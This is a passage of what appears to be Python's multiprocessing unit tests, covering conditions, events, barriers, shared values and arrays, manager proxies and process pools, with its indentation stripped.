sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
        # Removed temporarily due to API shear: this does not
        # work with threading._Event objects (is_set == isSet).
self.assertEqual(event.is_set(), False)
        # Removed: threading.Event.wait() returns the value of the __flag
        # instead of None (API shear with the semaphore-backed mp.Event).
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
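# Bunch starts n processes (or threads, depending on the namespace passed in)
# that all run f(*args); the 'started' and 'finished' DummyList counters let
# the barrier tests wait for every worker to reach a given point.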
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
        Test the return value from barrier.wait().
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
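# _TestValue and _TestArray cover the sharedctypes-backed Value/RawValue and
# Array/RawArray wrappers and only run for the 'processes' type; individual
# tests skip themselves when ctypes/sharedctypes support is missing.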
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
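# _TestContainers exercises manager proxies: ListProxy, DictProxy and
# Namespace, including proxies nested inside other proxies.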
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
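# Helper callables for the Pool tests. They are defined at module level so
# that they can be pickled and sent to worker processes.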
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
